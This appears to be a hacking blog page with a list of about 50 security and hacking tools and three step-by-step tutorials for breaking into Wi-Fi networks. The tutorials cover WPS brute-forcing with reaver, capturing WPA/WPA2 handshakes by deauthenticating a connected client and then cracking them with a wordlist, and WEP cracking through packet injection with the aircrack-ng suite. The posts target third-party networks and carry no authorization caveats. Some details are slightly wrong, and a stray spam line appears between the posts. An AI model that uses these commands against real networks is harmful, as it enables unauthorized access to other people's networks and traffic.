Top 50 Hacking Tools That You Must Have

Whether you are a Penetration tester, a hacker or an aspiring newbie trying to learn Cyber Security, you must have a nice catalogue of tools to make your life easier. While these tools do make working simpler but cannot compensate for the vast amount of knowledge required in this field. Ethical hacking and online security involves a lot efforts. Many tools are used to test and keep software secure. The same tools can also be used by hackers for exploitation.

hacking-tools

A hacking tool is a computer program or software which helps a hacker to hack a computer system or a computer program.

 In this post i’m going to mention 50 different tools under 9 categories that your ‘Hack Lab’ must have. Most of the tools mentioned in this post are pre-included in Kali Linux which you can install to have them at once.
Intrusion Detection Systems :-
These are the tools you must have if you’re building a hack lab for penetration testing or for any security arrangement. They help you detect of any threats that might harm the system.
  • Snort
  • NetCop

Encryption Tools :-
While the above tools do identify any suspicious activity but they can’t protect your data, you need encryption tools for that.
  • TrueCrypt (The project has been shut down and no longer supported)
  • OpenSSH
  • Putty
  • OpenSSL
  • Tor
  • OpenVPN
  • Stunnel
  • KeePass


Port Scanners :-

The next big thing is Port Scanners, you can’t penetrate a network without knowing what services are running on what ports.
  • Nmap
  • Superscan
  • Angry IP Scanner


Packet Sniffers :-

These tools let you intercept traffic incoming/outgoing from the network.
  • Wireshark
  • Tcpdump
  • Ettercap
  • Dsniff
  • EtherApe

Traffic Monitoring :-
These tools let’s you monitor and analyze what is currently going on in a network.
  • Splunk
  • Nagios
  • P0f
  • Ngrep  


Vulnerability Exploitation :-

These are the hardcore tools that you will use after identifying the flaw or loop hole in the security of a network.
  • Metasploit (The Best)
  • Sqlmap
  • Sqlninja
  • Social Engineer Toolkit
  • NetSparker
  • BeEF
  • Dradis

Packet Crafting :-
Packet Crafting tools facilitate finding vulnerabilities within the firewall.
  • Hping
  • Scapy
  • Netcat
  • Yersinia
  • Nemesis
  • Socat

Password Crackers :-
These tools let you crack passwords a computer has stored in it or is transmitting over the network.
  • Ophcrack
  • Medusa
  • RainbowCrack
  • Wfuzz
  • Brutus
  • L0phtCrack
  • Fgdump
  • THC Hydra
  • John The Ripper
  • Aircrack
  • oclHashcat
  • Cain and Abel


Wireless Hacking :-

If a network have a Wi-fi access point then it can easily be broken into. Various encryption methods like WEP, WPA/WPA2  or even the latest WPS have some serious security flaws. These tools help you intrude much easily.
  • Aircrack-ng
  • Kismet
  • InSSIDer
  • KisMAC
These were some of the tools which must be in any Cyber Security Researcher’s arsenal.
So, What are you waiting for – Let the hacking begin..!!
Did I miss some other cool tools which must be in this list, do let me know in the comments.
Enjoy..!!

Hacking WPS Enabled Wifi Networks With Reaver

In this tutorial i’m going to show you yet another way of cracking wifi networks. Today we are going to exploit a loophole in the newest feature of modern day routers, which is WPS (Wireless Protected Setup).This will work only if WPS is enabled on the router, which generally is.

image_techno

What You’ll Need :-
  • Preferably a PC with kali linux or Backtrack installed.
To crack WPS network we are going to use an awesome tool, REAVER-WPS created by Reaver-Systems



Don’t Miss :-

Cracking WPA/WPA-2 Networks

OR

Cracking WiFi (W.E.P Networks)



Steps To Follow :-

Open up a terminal window and put you wireless card into Monitor mode by typing:

  • airmon-ng start wlan0
 
Next, we will need the MAC Address of the router we are going to attack. Get this by typing:
  • airodump-ng mon0 or wash -i mon0
Now the list of routers available in the vicinity should appear, copy the address of targeted network.
Next, we start up reaver.
  • reaver -i mon0 -b MACADDRESSHERE -vv
Some Access Points tend to lock their W.P.S. state if they detect any suspicious activity for 5 minutes or so, in that case reaver will not carry on bruteforcing until the A.P. comes out of the locked state. The default period of reaver to check for the unlocked state is 315 seconds or 5 min 15 seconds. This can be increased or decreased using the ‘lock-delay’ option while launching reaver like this :
  • reaver -i mon0 -b MACADDRESSHERE -vv –lock-delay=300
You can also alter the time between pin attempts to fool the A.P. of any suspicious activity (default is 1 second) but it can increase the total bruteforcing time. If you need to use this delay feature use this command :
  • reaver -i mon0 -b MACADDRESSHERE -vv -d 5

Now just sit back and let the program do it’s work. It can take as long as 24+ hours for a weak signal. But usually less than 12 hours.

 
If you need to use your PC in the mean time, just save your work by pressing:
  • CTRL + ALT + C
And restart it from the same point just by following step 3 of the process.

Enjoy..!!

How To Hack Wifi : Cracking WPA/WPA2 Encryption

How To Hack Wifi Passwords :-

How it is Cracked:

WPA-WPA2 are a special case when it comes to Wireless Network Cracking. The method used to crack them is named ‘Handshake’. What should we do to get the Handshake is fooling a Computer connected to the network we will crack. Then we will use a dictionary to crack the Handshake and get the Key. So, this means that to crack these networks we need:
  • A huge dictionary / wordlist – The bigger, the Better. (You can find searching the web using terms like: ‘Large WPA-WPA2 Cracking Wordlist’)
  • A PC with backtrack or kali linux installed. So, let’s go and crack that network:
Enter your wireless interface into monitor mode:

  • airmon-ng start wlan0
image_techno
Get the list of the networks available:
  • airodump-ng mon0
image_techno
Get info on a specific Network:
  • airodump-ng -c channel -w filename –bssid macaddrs mon0
(‘channel’ is the Network’s channel number) (‘filename’ is the name of the file that airodump-ng will save its data) (‘macaddrs’ is the Network’s MAC Address)
image_techno
Note that under the STATION Tab there is a MAC address. This means that there is someone connected to that network and this is his PC’s MAC address. To get the handshake we will kick him off and he will automatically reconnect to the network.
So, to kick him of and get the handshake, type at a new terminal:
  • aireplay-ng -1 0 -a bssid mon0
(where ‘bssid’ you must type the Network‘s MAC Address)
image_techno
When we successfully get the handshake, stop the proccess by hitting CTRL+C at the terminal that Airodump-ng is running. The handshake should be placed at your Home Folder.
To crack it type:
  • aircrack-ng -w dictionary /username/filename
(‘dictionary’ is the name/path of your dictionary) (‘username’ is your username – on Backtrack is ‘root’ by default) (‘filename’ is the captured WPA/WPA2 Handshake)
image_techno

Enjoy..!!

Ludo king hack

Cracking Wifi With Kali Linux (WEP Networks)

Before we start.

I would recommend you to Install Kali Linux on your PC.


Don’t Miss : How To Hack Wifi Passwords

Cracking WiFi (W.P.S BruteForce)

OR

Cracking WPA/WPA-2 Networks



WEP Cracking.

WEP is very easy and fast to crack. Here are the steps:-
  • Put your Wireless Interface into Monitor Mode:
                airmon-ng start wlan0
image_techno
  • Get Info from the Available Networks:
                airodump-ng mon0
image_techno
  • Select one network that uses WEP encryption. In our Example the network is named SKIDHACKER. Now, get more info on the specific Network:
                     airodump-ng -c channel -w filetosave –bssid macaddrs mon0
(‘channel’ is the Channel Number) (‘filetosave’ is the file that airodump-ng will save its data) (‘macaddrs’ is the MAC Address of the Network) —> All this info is provided by the command used in Step 2.
  • To boost the proccedure type on a new terminal:
               aireplay-ng -1 0 -a bssid mon0
(‘bssid’ is the MAC Address of the Network)
image_techno
  • When this command is done, capture packets by typing:
                    aireplay-ng -2 -p 0841 -c FF:FF:FF:FF:FF:FF -b bssid mon0
(‘bssid’ is the Networks MAC Address)
image_techno
  • When the above command gets about 20.000 – 30.000 packets you are now able to crack the network by typing:
                    aircrack-ng filename.cap
(where instead of ‘filename’.cap you enter the file that aireplay-ng saved at your current directory – This file is named wep-x.cap –x is a number, starting from ’01′, then ’02′ etc….–) (Instead of the ‘wep-01.cap’ you can use the ‘wep*.cap’ as in the example to ‘Auto-Select’ the file)
image_techno
  • When aircrack-ng finds the key it will display something like:
                    KEY FOUND! [ 12:34:56:78:90 ]
(In this example our key is ’1234567890′)
  • When Finished, make sure you put your wireless interface back to original Mode by typing:
                    airmon-ng stop wlan0Enjoy..!!